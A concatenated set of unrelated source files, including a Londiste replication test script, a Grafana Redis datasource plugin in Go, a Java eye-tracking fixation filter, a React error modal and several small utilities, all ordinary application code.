run londiste $v conf/londiste_$db.ini add-table mytable --create
done

# Give the initial copy time to complete.
run sleep 20

msg "Add column on root"
run cat ddl.sql
run londiste $v conf/londiste_db1.ini execute ddl.sql

msg "Insert data into new column"
for n in 5 6 7 8; do
run psql -d db1 -c "insert into mytable values ($n, 'row$n', 'data2')"
done

msg "Wait a bit"
run sleep 20
# Verify the DDL and data propagated to branch node3.
run psql -d db3 -c '\d mytable'
run psql -d db3 -c 'select * from mytable'
run sleep 10
./zcheck.sh

msg "Change topology"
run londiste $v conf/londiste_db1.ini status
run londiste $v conf/londiste_db3.ini change-provider --provider=node1
run londiste $v conf/londiste_db1.ini status
run londiste $v conf/londiste_db1.ini switchover --target=node2
run londiste $v conf/londiste_db1.ini status
run sleep 10
./zcheck.sh
|
#!/usr/bin/env bash
# Xcode Server trigger: analyze the primary repo, then upload the results.
# Fix: `set -o pipefail` is a bash/ksh/zsh feature; under a POSIX `sh`
# (e.g. dash) it aborts with "Illegal option", so the shebang must request bash.
set -euo pipefail

# Quoted in case the checkout path contains spaces.
cd "$XCS_PRIMARY_REPO_DIR"

sh Scripts/analyze.sh iOS
sh Scripts/upload.sh
|
<gh_stars>1-10
# frozen_string_literal: true
module Qernel
module Reconciliation
# Electrolysers are a special-case producer whose load profile is based on
# the electricity output by another node.
#
# The electricity node is expected to be the only input to the electrolyser,
# and will have a second electricity output to a curtailment node.
#
# [ Electrolyser ] <-
# [ Electricity Producer ]
# [ Curtailment ] <--
#
# The load profile is based on the electricity profile of the input
# producer, limited by the efficiency and capacity of the electrolyser. From
# the resulting profile, the demand and full load hours can be calculated,
# and the share of curtailment updated.
class ElectrolyserAdapter < ProducerAdapter
  def initialize(*)
    super

    # The single electricity input edge links back to the producing node.
    @producer = @node.input(:electricity).edges.first.rgt_node

    output_conversion_name = @context.carrier_named('%s_output_conversion')

    # Capacity needs to be calculated early, as number_of_units requires
    # demand to be present; this varies based on demand.
    @carrier_capacity =
      @node.node_api.input_capacity *
      @node.node_api.public_send(output_conversion_name) *
      @node.node_api.number_of_units

    # Pre-compute electricity while demand is set on the node.
    max_available_electricity

    setup(phase: demand_phase)
  end

  # Public: Capacity-limited demand curve describing the amount of
  # electricity converted to - and output as - carrier energy.
  def demand_curve
    @demand_curve ||= begin
      # Clip each hourly value to the electrolyser's output capacity.
      unlimited_carrier_curve.map do |value|
        value < @carrier_capacity ? value : @carrier_capacity
      end
    end
  end

  # Writes the calculated demand, full load hours, and input-edge share back
  # onto the node before the graph is recalculated.
  def before_graph_recalculation!
    return if carrier_demand.zero?

    @node.demand =
      carrier_demand / @node.output(@context.carrier).conversion

    # 3600 converts between MJ (demand) and MWh-based capacity.
    @node[:full_load_hours] =
      carrier_demand / (@carrier_capacity * 3600)

    electricity_h2_share = @node.demand / max_available_electricity

    # Set share explicitly to 1.0 when the producer -> electrolyser share is
    # very close to 1.0 (floating point errors).
    @node.input(:electricity).edges.first.share =
      (1 - electricity_h2_share).abs < 1e-4 ? 1.0 : electricity_h2_share
  end

  private

  # Internal: Demand is assigned manually in before_graph_recalculation!
  # rather than derived from a profile.
  def demand_phase
    :manual
  end

  # Internal: The maximum amount of electricity available for conversion to
  # the carrier.
  #
  # Returns a Float.
  def max_available_electricity
    @max_available_electricity ||=
      @producer.demand * @producer.output(:electricity).conversion
  end

  # Internal: The maximum amount of carrier energy which may be emitted by
  # the electrolyser assuming no curtailment and unlimited output capacity.
  #
  # Returns a Float.
  def max_carrier_production
    max_available_electricity * @node.output(@context.carrier).conversion
  end

  # Internal: Curve representing the maximum amount of carrier energy that
  # may be produced in each hour, assuming no electricity is curtailed, and
  # unlimited output capacity of the carrier conversion.
  #
  # Returns a Merit::Curve.
  def unlimited_carrier_curve
    demand_profile * max_carrier_production
  end

  # Internal: The total demand of the producer is determined with the
  # capacity-limited demand curve.
  #
  # Returns a Float.
  def calculate_carrier_demand
    demand_curve.sum * 3600
  end

  # Internal: Amplified dynamic profiles must use the electricity producer
  # FLH, as the electrolyser FLH may not be correct prior to calculating.
  #
  # Returns a numeric.
  def full_load_hours
    @producer.node_api.full_load_hours
  end
end
end
end
|
from django.db import models
# Create your models here.
class Ad(models.Model):
    """A classified-ad listing with a title, description, price and location."""

    title = models.CharField(max_length=200)
    description = models.TextField()
    # Up to 10 digits total, 2 after the decimal point (max 99,999,999.99).
    price = models.DecimalField(max_digits=10, decimal_places=2)
    location = models.CharField(max_length=100)

    def __str__(self):
        # Fix: the method was misnamed `str`, so Django (admin, shell, logs)
        # fell back to the default "Ad object (pk)" representation.
        return self.title
/*
*
*/
package net.community.chest.swing.component.spinner;
import javax.swing.JSpinner;
import javax.swing.SpinnerModel;
import net.community.chest.dom.DOMUtils;
import net.community.chest.dom.proxy.XmlProxyConvertible;
import net.community.chest.dom.transform.XmlConvertible;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
/**
* <P>Copyright GPLv2</P>
*
* @author <NAME>.
* @since Mar 11, 2009 11:26:46 AM
*
*/
// JSpinner subclass that can populate itself from an XML element via the
// XmlConvertible contract; serialisation to XML is intentionally unsupported.
public class BaseSpinner extends JSpinner implements XmlConvertible<BaseSpinner> {
    /**
     *
     */
    private static final long serialVersionUID = 9108163768497244843L;

    public BaseSpinner (SpinnerModel model)
    {
        super(model);
    }

    // Default model is a number model.
    public BaseSpinner ()
    {
        this(new BaseSpinnerNumberModel());
    }

    // Hook for subclasses to supply a different reflective proxy; null element
    // yields a null converter (fromXml then leaves the spinner untouched).
    protected XmlProxyConvertible<?> getSpinnerConverter (Element elem)
    {
        return (null == elem) ? null : JSpinnerReflectiveProxy.SPINNER;
    }
    /*
     * @see net.community.chest.dom.transform.XmlConvertible#fromXml(org.w3c.dom.Element)
     */
    @Override
    public BaseSpinner fromXml (Element elem) throws Exception
    {
        final XmlProxyConvertible<?> proxy=getSpinnerConverter(elem);
        @SuppressWarnings("unchecked")
        final Object o=
            (null == proxy) ? this : ((XmlProxyConvertible<Object>) proxy).fromXml(this, elem);
        // The proxy must configure this instance in place, never replace it.
        if (o != this)
            throw new IllegalStateException("fromXml(" + DOMUtils.toString(elem) + ") mismatched instances");
        return this;
    }

    // NOTE(review): this constructor invokes the overridable fromXml() during
    // construction — subclass overrides run before the subclass is initialised.
    public BaseSpinner (Element elem) throws Exception
    {
        final Object o=fromXml(elem);
        if (o != this)
            throw new IllegalStateException("<init>(" + DOMUtils.toString(elem) + ") mismatched instances");
    }
    /*
     * @see net.community.chest.dom.transform.XmlConvertible#toXml(org.w3c.dom.Document)
     */
    @Override
    public Element toXml (Document doc) throws Exception
    {
        throw new UnsupportedOperationException("toXml() N/A");
    }
}
|
#!/bin/sh
# Launch the nilqed/jfricas notebook image with X11 access for local root.
echo Running "nilqed/jfricas:latest"
echo Use docker commit if you want to save your changes!
echo Warning: using xhost local:root

# Grant the container's root user access to the local X server.
xhost local:root

# Host networking so the notebook port is reachable; DISPLAY forwarded for X11.
docker run -ti --network=host --env DISPLAY="$DISPLAY" nilqed/jfricas:latest \
    jupyter notebook --no-browser --allow-root

# Show container status, then revoke the X server grant again.
docker ps -a
xhost -local:root
echo done.
|
/**
 * Multiply two decimal numbers, rounding the product to a fixed number of
 * decimal places to hide binary floating-point noise (e.g. 0.1 * 0.2).
 *
 * @param {number} a First factor.
 * @param {number} b Second factor.
 * @param {number} [precision=4] Decimal places to round the product to
 *   (generalises the previously hard-coded 4; default keeps old behaviour).
 * @returns {number} The rounded product.
 */
function multiplyDecimals(a, b, precision = 4) {
  return parseFloat((a * b).toFixed(precision));
}
/**
* @author mconway
* Exception hierarchy for state machine
*/
package org.angrygoat.domainmachine.exception; |
package main
import (
"context"
"crypto/tls"
"crypto/x509"
"encoding/json"
"fmt"
"strings"
"time"
"github.com/grafana/grafana-plugin-sdk-go/backend"
"github.com/grafana/grafana-plugin-sdk-go/backend/datasource"
"github.com/grafana/grafana-plugin-sdk-go/backend/instancemgmt"
"github.com/grafana/grafana-plugin-sdk-go/backend/log"
"github.com/mediocregopher/radix/v3"
)
/**
* The function is called when the instance is created for the first time or when a datasource configuration changed.
*/
// newDatasource builds the ServeOpts for this plugin. It is invoked when the
// instance is first created or when the datasource configuration changes.
func newDatasource() datasource.ServeOpts {
	instanceManager := datasource.NewInstanceManager(newDataSourceInstance)

	ds := &redisDatasource{im: instanceManager}

	// The datasource handles both data queries and health checks.
	return datasource.ServeOpts{
		QueryDataHandler:   ds,
		CheckHealthHandler: ds,
	}
}
/**
* QueryData handles multiple queries and returns multiple responses.
* req contains the queries []DataQuery (where each query contains RefID as a unique identifer).
* The QueryDataResponse contains a map of RefID to the response for each query, and each response contains Frames ([]*Frame).
*/
// QueryData executes each incoming query individually and returns one
// response per query, keyed by the query's RefID.
func (ds *redisDatasource) QueryData(ctx context.Context, req *backend.QueryDataRequest) (*backend.QueryDataResponse, error) {
	log.DefaultLogger.Debug("QueryData", "request", req)

	// Resolve the per-datasource Redis client.
	client, err := ds.getInstance(req.PluginContext)
	if err != nil {
		return nil, err
	}

	response := backend.NewQueryDataResponse()

	// Run the queries one by one, indexing each result by its RefID.
	for _, query := range req.Queries {
		response.Responses[query.RefID] = ds.query(ctx, query, client)
	}

	return response, nil
}
/**
* CheckHealth handles health checks sent from Grafana to the plugin
*
* @see https://redis.io/commands/ping
*/
// CheckHealth answers Grafana's health probe by issuing a Redis PING.
//
// See https://redis.io/commands/ping
func (ds *redisDatasource) CheckHealth(ctx context.Context, req *backend.CheckHealthRequest) (*backend.CheckHealthResult, error) {
	var status backend.HealthStatus
	message := "Data Source health is yet to become known."

	client, err := ds.getInstance(req.PluginContext)
	if err != nil {
		status = backend.HealthStatusError
		message = fmt.Sprintf("getInstance error: %s", err.Error())
	} else if pingErr := client.Do(radix.Cmd(&message, "PING")); pingErr != nil {
		status = backend.HealthStatusError
		message = fmt.Sprintf("PING command failed: %s", pingErr.Error())
	} else {
		status = backend.HealthStatusOk
		message = "Data Source is working as expected."
	}

	return &backend.CheckHealthResult{
		Status:  status,
		Message: message,
	}, nil
}
/**
* Return Instance
*/
// getInstance resolves the per-datasource Redis client via the instance manager.
func (ds *redisDatasource) getInstance(ctx backend.PluginContext) (ClientInterface, error) {
	instance, err := ds.im.Get(ctx)
	if err != nil {
		return nil, err
	}
	return instance.(*instanceSettings).client, nil
}
/**
 * newDataSourceInstance builds a radix client (pool, cluster, sentinel or
 * unix-socket pool) from the data source settings — including optional
 * password/ACL authentication and TLS — and wraps it in instanceSettings.
 *
 * @see https://github.com/mediocregopher/radix
 */
func newDataSourceInstance(setting backend.DataSourceInstanceSettings) (instancemgmt.Instance, error) {
	var jsonData dataModel

	// Unmarshal Configuration
	var dataError = json.Unmarshal(setting.JSONData, &jsonData)
	if dataError != nil {
		log.DefaultLogger.Error("JSONData", "Error", dataError)
		return nil, dataError
	}

	// Debug
	log.DefaultLogger.Debug("JSONData", "Values", jsonData)

	// Pool size (number of pooled connections), default 5
	poolSize := 5
	if jsonData.PoolSize > 0 {
		poolSize = jsonData.PoolSize
	}

	// Connect, Read and Write Timeout in seconds, default 10
	timeout := 10
	if jsonData.Timeout > 0 {
		timeout = jsonData.Timeout
	}

	// Ping Interval, disabled by default (0)
	pingInterval := 0
	if jsonData.PingInterval > 0 {
		pingInterval = jsonData.PingInterval
	}

	// Pipeline Window, disabled by default (0)
	pipelineWindow := 0
	if jsonData.PipelineWindow > 0 {
		pipelineWindow = jsonData.PipelineWindow
	}

	// Secured Data (password and TLS material decrypted by Grafana)
	var secureData = setting.DecryptedSecureJSONData

	// Set up connection: dial options are rebuilt for every new connection
	connFunc := func(network, addr string) (radix.Conn, error) {
		opts := []radix.DialOpt{radix.DialTimeout(time.Duration(timeout) * time.Second)}

		// Authentication
		if secureData != nil && secureData["password"] != "" {
			// If ACL enabled, authenticate as user+password; otherwise password only
			if jsonData.ACL {
				opts = append(opts, radix.DialAuthUser(jsonData.User, secureData["password"]))
			} else {
				opts = append(opts, radix.DialAuthPass(secureData["password"]))
			}
		}

		// TLS Authentication
		if jsonData.TLSAuth {
			// TLS Config
			tlsConfig := &tls.Config{
				InsecureSkipVerify: jsonData.TLSSkipVerify,
			}

			// Certification Authority: only installed when the PEM actually parses;
			// a malformed CA silently falls back to the system roots
			if secureData["tlsCACert"] != "" {
				caPool := x509.NewCertPool()
				ok := caPool.AppendCertsFromPEM([]byte(secureData["tlsCACert"]))
				if ok {
					tlsConfig.RootCAs = caPool
				}
			}

			// Client Certificate and Key (mutual TLS)
			if secureData["tlsClientCert"] != "" {
				cert, err := tls.X509KeyPair([]byte(secureData["tlsClientCert"]), []byte(secureData["tlsClientKey"]))
				if err == nil {
					tlsConfig.Certificates = []tls.Certificate{cert}
				} else {
					log.DefaultLogger.Error("X509KeyPair", "Error", err)
					return nil, err
				}
			}

			// Add TLS Config
			opts = append(opts, radix.DialUseTLS(tlsConfig))
		}

		return radix.Dial(network, addr, opts...)
	}

	// Pool with specified Ping Interval, Pipeline Window and Timeout.
	// NOTE(review): the interval is divided by poolSize+1 — presumably so the
	// pool as a whole pings roughly once per interval; confirm against radix docs.
	poolFunc := func(network, addr string) (radix.Client, error) {
		return radix.NewPool(network, addr, poolSize, radix.PoolConnFunc(connFunc),
			radix.PoolPingInterval(time.Duration(pingInterval)*time.Second/time.Duration(poolSize+1)),
			radix.PoolPipelineWindow(time.Duration(pipelineWindow)*time.Microsecond, 0))
	}

	var client ClientInterface
	var err error

	// Client Type: for cluster/sentinel the URL may hold a comma-separated host list
	switch jsonData.Client {
	case "cluster":
		client, err = radix.NewCluster(strings.Split(setting.URL, ","), radix.ClusterPoolFunc(poolFunc))
	case "sentinel":
		client, err = radix.NewSentinel(jsonData.SentinelName, strings.Split(setting.URL, ","), radix.SentinelConnFunc(connFunc),
			radix.SentinelPoolFunc(poolFunc))
	case "socket":
		client, err = poolFunc("unix", setting.URL)
	default:
		client, err = poolFunc("tcp", setting.URL)
	}

	if err != nil {
		return nil, err
	}

	return &instanceSettings{
		client,
	}, nil
}
/**
 * Dispose is called by the instance manager before a new instance replaces
 * this one; it closes the Redis client so pooled connections are released.
 */
func (s *instanceSettings) Dispose() {
	s.client.Close()
}
|
import {
Box,
Button,
Collapse,
List,
ListItem,
Modal,
ModalBody,
ModalOverlay,
ModalContent,
ModalHeader,
ModalCloseButton,
ModalFooter,
Stack,
Text
} from '@chakra-ui/react'
import {useState} from 'react'
import {FallbackProps} from 'react-error-boundary'
import {ExternalLink} from 'lib/components/link'
// User-facing headline for the error modal. BUGFIX: "occured" -> "occurred".
const title = 'Unfortunately it appears an error has occurred..'
function StackTrace({stackTrace, ...p}) {
// Hide the stack trace in production
const [show, setShow] = useState(process.env.NODE_ENV !== 'production')
const handleToggle = () => setShow((show) => !show)
return (
<Stack spacing={4} {...p}>
<Button onClick={handleToggle} colorScheme='blue'>
{show ? 'Hide' : 'Show'} stack trace
</Button>
<Collapse in={show}>
<Box
fontFamily='mono'
overflowX='scroll'
whiteSpace='pre'
padding={2}
bg='gray.800'
color='white'
>
{stackTrace}
</Box>
</Collapse>
</Stack>
)
}
/**
 * Modal shown by the error boundary when an uncaught error reaches the top
 * of the tree: displays the message, the stack trace (collapsible) and
 * screenshot instructions, and offers navigation back to the previous page.
 */
export default function ErrorModal({error, resetErrorBoundary}: FallbackProps) {
  const message = typeof error === 'string' ? error : error.message
  const stackTrace = error.stack
  // Reset the boundary, then leave the page that crashed
  const handleGoBack = () => {
    resetErrorBoundary()
    window.history.back()
  }
  return (
    <Modal
      closeOnOverlayClick={false}
      isOpen={!!error}
      onClose={() => resetErrorBoundary()}
      size='2xl'
    >
      <ModalOverlay />
      <ModalContent borderRadius='4px'>
        <ModalHeader>{title}</ModalHeader>
        <ModalCloseButton />
        <ModalBody>
          <Stack spacing={4}>
            <Text>{message}</Text>
            {stackTrace && <StackTrace stackTrace={stackTrace} />}
            <List styleType='disc'>
              <ListItem>
                <ExternalLink href='https://support.apple.com/en-us/HT201361'>
                  How to take a screenshot on a Mac
                </ExternalLink>
              </ListItem>
              <ListItem>
                <ExternalLink href='https://www.howtogeek.com/226280/how-to-take-screenshots-in-windows-10/'>
                  How to take a screenshot on a PC
                </ExternalLink>
              </ListItem>
            </List>
          </Stack>
        </ModalBody>
        <ModalFooter>
          <Button colorScheme='yellow' onClick={handleGoBack}>
            Go back
          </Button>
        </ModalFooter>
      </ModalContent>
    </Modal>
  )
}
|
<reponame>MunzT/ETFuse
package de.uni_stuttgart.visus.etfuse.eyetracker.gazefilter;
import java.awt.geom.Point2D;
import java.util.ArrayList;
import de.uni_stuttgart.visus.etfuse.eyetracker.EyeTrackerEyeEvent;
import de.uni_stuttgart.visus.etfuse.eyetracker.EyeTrackerRecording;
/**
 * Velocity-threshold (I-VT) gaze filter.
 *
 * Pipeline: classify raw samples by angular velocity, group consecutive
 * below-threshold samples, collapse each group to its centroid, merge
 * centroids closer than a pixel distance threshold, and emit one synthetic
 * eye event per resulting fixation.
 */
public class IVTFilter {

    /** Velocity classification for one raw gaze sample. */
    private static class PointToPointVelocity {
        int idx;                    // index of the sample in the raw event list
        double velocity;            // angular velocity in degrees per second
        Boolean isFixation = false; // below-threshold sample => fixation candidate
    }

    /** Fixation candidate: centroid plus the covered raw-sample index range. */
    private static class Fixation {
        int startIdx;
        int stopIdx;
        double x;
        double y;
    }

    /**
     * Runs the I-VT pipeline on a recording and stores the resulting
     * fixation events on it.
     *
     * @param rec               recording holding the raw eye events
     * @param velocityThreshold max. angular velocity (deg/s) for a fixation sample
     * @param distanceThreshold min. pixel distance between distinct fixations
     * @return the same recording, with filtered eye events set
     */
    public static EyeTrackerRecording filterRecording(EyeTrackerRecording rec,
                                                      double velocityThreshold,
                                                      int distanceThreshold) {

        ArrayList<EyeTrackerEyeEvent> events = rec.getRawEyeEvents();
        ArrayList<PointToPointVelocity> p2pvs = new ArrayList<PointToPointVelocity>();

        // The first and last samples have no two neighbors; they are recorded
        // as non-fixation samples with zero velocity (isFixation defaults to false).
        PointToPointVelocity first = new PointToPointVelocity();
        first.idx = 0;
        first.velocity = 0.0;
        p2pvs.add(first);

        for (int i = 1; i < events.size() - 1; i++) {
            EyeTrackerEyeEvent e0 = events.get(i - 1);
            EyeTrackerEyeEvent e1 = events.get(i);
            EyeTrackerEyeEvent e2 = events.get(i + 1);

            // A sample's velocity is the mean of the velocities to its neighbors.
            double angleVelocitye0e1 = calculateInterPointVelocity(e0, e1, rec.getDisplayPPI(),
                    rec.getSamplingFrequency());
            double angleVelocitye1e2 = calculateInterPointVelocity(e1, e2, rec.getDisplayPPI(),
                    rec.getSamplingFrequency());
            double pointToPointVelocity = (angleVelocitye0e1 + angleVelocitye1e2) / 2.0;

            PointToPointVelocity p2pv = new PointToPointVelocity();
            p2pv.idx = i;
            p2pv.velocity = pointToPointVelocity;
            p2pv.isFixation = pointToPointVelocity < velocityThreshold;
            p2pvs.add(p2pv);
        }

        PointToPointVelocity last = new PointToPointVelocity();
        last.idx = events.size() - 1;
        last.velocity = 0.0;
        p2pvs.add(last);

        ArrayList<EyeTrackerEyeEvent> fixations =
                generateFixationEvents(events, filterByDistanceThreshold(
                        mapFixationGroupsToCentroid(generateFixationGroups(events, p2pvs)),
                        distanceThreshold));

        rec.setFilteredEyeEvents(fixations);

        System.out.println("<IVTFilter> Events: " + events.size() + " Fixations: " + fixations.size());

        return rec;
    }

    /**
     * Distance from the (averaged) eye position to the sample's gaze point.
     * With the fixed 90-degree angle the law of cosines below reduces to the
     * Pythagorean theorem.
     */
    private static double calculateEventEyeDistAverage(EyeTrackerEyeEvent e) {
        double eyePosAverageX = (e.eyePosLeftX + e.eyePosRightX) * 0.5;
        double eyePosAverageY = (e.eyePosLeftY + e.eyePosRightY) * 0.5;
        double observerBaseDist = (e.eyePosLeftZ + e.eyePosRightZ) * 0.5;

        Point2D eventPoint = new Point2D.Double(e.realFixationPointX, e.realFixationPointY);
        Point2D basePoint = new Point2D.Double(eyePosAverageX, eyePosAverageY);
        double eventBaseDist = eventPoint.distance(basePoint);

        double eyeEventDist = Math.sqrt(Math.pow(observerBaseDist, 2) + Math.pow(eventBaseDist, 2) -
                2 * observerBaseDist * eventBaseDist * Math.cos(Math.toRadians(90)));

        return eyeEventDist;
    }

    /**
     * Angular velocity (degrees/second) between two consecutive samples.
     * Treats the averaged eye-to-point distance as the two equal legs of an
     * isosceles triangle, derives the visual angle via the law of cosines,
     * then divides by the sample period.
     */
    private static double calculateInterPointVelocity(EyeTrackerEyeEvent e1, EyeTrackerEyeEvent e2,
                                                      double displayPPI, double samplingFrequency) {
        double averageEyeDist1_b = IVTFilter.calculateEventEyeDistAverage(e1);
        double averageEyeDist2_a = IVTFilter.calculateEventEyeDistAverage(e2);
        double averageEyeDistBetweenEvents = 0.5 * (averageEyeDist1_b + averageEyeDist2_a);

        Point2D e1P_A = new Point2D.Double(e1.realFixationPointX, e1.realFixationPointY);
        Point2D e2P_B = new Point2D.Double(e2.realFixationPointX, e2.realFixationPointY);
        double eventPointDist_c = e1P_A.distance(e2P_B);
        double eventPointDist_mm = pixelDistanceToMillimeters(eventPointDist_c, displayPPI);

        double gazeAngle_gamma = Math.acos((Math.pow(eventPointDist_mm, 2)
                - Math.pow(averageEyeDistBetweenEvents, 2)
                - Math.pow(averageEyeDistBetweenEvents, 2))
                / (-2 * averageEyeDistBetweenEvents * averageEyeDistBetweenEvents));
        gazeAngle_gamma = Math.toDegrees(gazeAngle_gamma);

        // acos returns NaN when the triangle inequality is violated
        // (e.g. zero eye distance); keep the diagnostic output.
        if (Double.isNaN(gazeAngle_gamma)) {
            System.out.println("NaN :(");
            System.out.println("b: " + averageEyeDist1_b + " a: " + averageEyeDist2_a + " c: "
                    + eventPointDist_c + " e1: " + e1P_A + " e2: " + e2P_B);
        }

        // degrees per sample divided by the sample period => degrees/second
        double eventAngleSeconds = gazeAngle_gamma / (1.0 / samplingFrequency);
        return eventAngleSeconds;
    }

    /**
     * Removes samples where the tracker lost both eyes.
     * NOTE(review): not referenced inside this class; confirm external need
     * before removing (it is private, so it currently looks like dead code).
     */
    private static ArrayList<EyeTrackerEyeEvent>
            filterOutEventsWithoutEyes(ArrayList<EyeTrackerEyeEvent> events) {
        ArrayList<EyeTrackerEyeEvent> filtered = new ArrayList<EyeTrackerEyeEvent>();
        for (EyeTrackerEyeEvent e : events) {
            if (e.eyesNotFound)
                continue;
            filtered.add(e);
        }
        return filtered;
    }

    /** Converts a pixel distance to millimeters (1 mm = 0.039370 in). */
    private static double pixelDistanceToMillimeters(double distance, double ppi) {
        double inches = distance / ppi;
        double mm = inches / 0.039370;
        return mm;
    }

    /**
     * Splits the classification protocol into runs of consecutive
     * fixation-flagged samples, one single-sample Fixation per entry.
     */
    private static ArrayList<ArrayList<Fixation>>
            generateFixationGroups(ArrayList<EyeTrackerEyeEvent> events,
                                   ArrayList<PointToPointVelocity> protocol) {

        ArrayList<ArrayList<Fixation>> fixationGroups = new ArrayList<ArrayList<Fixation>>();
        ArrayList<Fixation> currentFixationGroup = new ArrayList<Fixation>();

        for (PointToPointVelocity p : protocol) {
            if (p.isFixation) {
                Fixation fix = new Fixation();
                fix.startIdx = p.idx;
                fix.stopIdx = p.idx;
                fix.x = events.get(p.idx).realFixationPointX;
                fix.y = events.get(p.idx).realFixationPointY;
                currentFixationGroup.add(fix);
            }
            else {
                if (currentFixationGroup.size() > 0) {
                    fixationGroups.add(currentFixationGroup);
                    currentFixationGroup = new ArrayList<Fixation>();
                }
            }
        }

        // Flush a group still open at the end of the protocol. With the
        // current caller this cannot trigger (the protocol always ends with a
        // non-fixation sentinel), but it keeps the method correct standalone.
        if (currentFixationGroup.size() > 0) {
            fixationGroups.add(currentFixationGroup);
        }

        return fixationGroups;
    }

    /** Collapses each group of fixation samples to a single centroid Fixation. */
    private static ArrayList<Fixation>
            mapFixationGroupsToCentroid(ArrayList<ArrayList<Fixation>> fixationGroups) {
        ArrayList<Fixation> fixations = new ArrayList<Fixation>();

        for (ArrayList<Fixation> currentGroup : fixationGroups) {
            double fixPointX = 0.0;
            double fixPointY = 0.0;
            for (Fixation f : currentGroup) {
                fixPointX += f.x;
                fixPointY += f.y;
            }
            fixPointX = fixPointX / currentGroup.size();
            fixPointY = fixPointY / currentGroup.size();

            Fixation newF = new Fixation();
            newF.x = fixPointX;
            newF.y = fixPointY;
            newF.startIdx = currentGroup.get(0).startIdx;
            newF.stopIdx = currentGroup.get(currentGroup.size() - 1).stopIdx;
            fixations.add(newF);
        }

        return fixations;
    }

    /**
     * Repeatedly merges neighboring fixations whose centroids lie closer
     * than distanceThreshold pixels, until a pass performs no merge.
     *
     * BUGFIX: the previous version only ever appended e1 inside the loop, so
     * the final fixation was silently dropped whenever the last pair was not
     * merged, and a list with exactly one fixation came back empty. The
     * trailing element that was not consumed by a merge is now appended
     * after each pass.
     */
    private static ArrayList<Fixation> filterByDistanceThreshold(ArrayList<Fixation> fixations,
                                                                 int distanceThreshold) {
        ArrayList<Fixation> filteredFixations = fixations;
        ArrayList<Fixation> newFixations = new ArrayList<Fixation>();
        boolean repeat = true;

        while (repeat) {
            repeat = false;
            int i;
            for (i = 0; i < filteredFixations.size() - 1; i++) {
                Fixation e1 = filteredFixations.get(i);
                Fixation e2 = filteredFixations.get(i + 1);

                Point2D e1P = new Point2D.Double(e1.x, e1.y);
                Point2D e2P = new Point2D.Double(e2.x, e2.y);

                if (e1P.distance(e2P) < distanceThreshold) {
                    repeat = true;

                    // Merge the pair into its midpoint, covering both ranges
                    double newX = (e1.x + e2.x) / 2.0;
                    double newY = (e1.y + e2.y) / 2.0;

                    Fixation fNew = new Fixation();
                    fNew.x = newX;
                    fNew.y = newY;
                    fNew.startIdx = e1.startIdx;
                    fNew.stopIdx = e2.stopIdx;
                    newFixations.add(fNew);

                    i++; // e2 was consumed by the merge
                }
                else {
                    newFixations.add(e1);
                }
            }

            // Append the trailing fixation not consumed by a merge
            // (i == size means the last pair was merged).
            if (i < filteredFixations.size()) {
                newFixations.add(filteredFixations.get(i));
            }

            filteredFixations = newFixations;
            if (repeat)
                newFixations = new ArrayList<Fixation>();
        }

        return filteredFixations;
    }

    /**
     * Materializes each fixation as a synthetic eye event: position is the
     * rounded centroid, timestamp/number/eyesNotFound come from the first
     * covered raw sample and the duration spans to the last covered sample.
     */
    private static ArrayList<EyeTrackerEyeEvent>
            generateFixationEvents(ArrayList<EyeTrackerEyeEvent> allEvents,
                                   ArrayList<Fixation> fixations) {

        ArrayList<EyeTrackerEyeEvent> fixationEvents = new ArrayList<EyeTrackerEyeEvent>();

        for (Fixation f : fixations) {
            EyeTrackerEyeEvent startingEvent = allEvents.get(f.startIdx);

            EyeTrackerEyeEvent fixE = new EyeTrackerEyeEvent();
            fixE.fixationPointX = (int) Math.round(f.x);
            fixE.fixationPointY = (int) Math.round(f.y);
            fixE.timestamp = startingEvent.timestamp;
            fixE.number = startingEvent.number;
            fixE.eyesNotFound = startingEvent.eyesNotFound;
            fixE.fixationDuration = allEvents.get(f.stopIdx).timestamp - fixE.timestamp;
            fixationEvents.add(fixE);
        }

        return fixationEvents;
    }
}
|
<reponame>tom-weatherhead/thaw-genetic
// thaw-genetic/src/interfaces/ichromosome.ts
/**
 * A candidate solution evolved by the genetic algorithm.
 */
export interface IChromosome {
	/** Fitness score of this chromosome (better/worse direction is problem-specific — see implementations). */
	fitness: number;
	/** Human-readable rendering of the chromosome's genes. */
	toString(): string;
	/* eslint-disable @typescript-eslint/no-explicit-any */
	/** Orders this chromosome relative to another by fitness; sign convention presumably matches Array.prototype.sort comparators — TODO confirm against implementations. */
	compareFitness(other: any): number;
	/** Equality with another chromosome. */
	isEqualTo(other: any): boolean;
	/* eslint-enable @typescript-eslint/no-explicit-any */
}
/**
 * Produces chromosomes for a genetic run.
 */
export interface IChromosomeFactory<T extends IChromosome> {
	/** Initial population used to seed generation zero. */
	createSeedChromosomes(): T[];
	/** A single randomly generated chromosome. */
	createRandomChromosome(): T;
}
|
<reponame>Harveyhubbell/Paid-RTOS<filename>Reference/qpc/html/search/all_17.js<gh_stars>0
// Auto-generated client-side search index (Doxygen, html/search/all_17.js).
// Each entry: [lowercased term with numeric suffix, [display name,
// [target page, in-page flag, scope/tooltip], ...]]. Do not edit by hand.
var searchData=
[
  ['waitset_914',['waitSet',['../qxthread_8h.html#ab7f603a22e6cbc0d27a31d338cad5eb6',1,'QXSemaphore::waitSet()'],['../qxthread_8h.html#ab7f603a22e6cbc0d27a31d338cad5eb6',1,'QXMutex::waitSet()']]],
  ['win32_20api_20_28windows_29_915',['Win32 API (Windows)',['../win32.html',1,'ports_os']]],
  ['win32_2dqv_20_28windows_20with_20qv_29_916',['Win32-QV (Windows with QV)',['../win32-qv.html',1,'ports_os']]],
  ['win32_5fgui_917',['WIN32_GUI',['../macros_8h.html#a8f79859d1e9f6f0a55e722dfe573c547',1,'macros.h']]]
];
|
#!python
# Copyright (C) 2017, 2019-2020 FIUBioRG
# SPDX-License-Identifier: MIT
import os
from os import path
import subprocess
from subprocess import Popen, PIPE
import sys
# "major.minor" of the running interpreter (e.g. "3.9"); presumably used to
# locate versioned Python libs/headers later in the build — confirm usage.
python_version = ".".join(map(str, sys.version_info[0:2]))
###################################################################
# HELPER FUNCTIONS
###################################################################
def SourcePath(*args):
    """Map each relative name to an absolute path under ./src/."""
    return [path.abspath("./src/" + name) for name in args]
def ObjectPath(*args):
    """Map each relative name to an absolute path under ./obj/."""
    return [path.abspath("./obj/" + name) for name in args]
def LibPath(*args):
    """Map each relative name to an absolute path under ./lib/."""
    return [path.abspath("./lib/" + name) for name in args]
def cmdline(command):
    """Run *command* through the shell and return its decoded stdout."""
    proc = Popen(args=command, stdout=PIPE, shell=True)
    out, _ = proc.communicate()
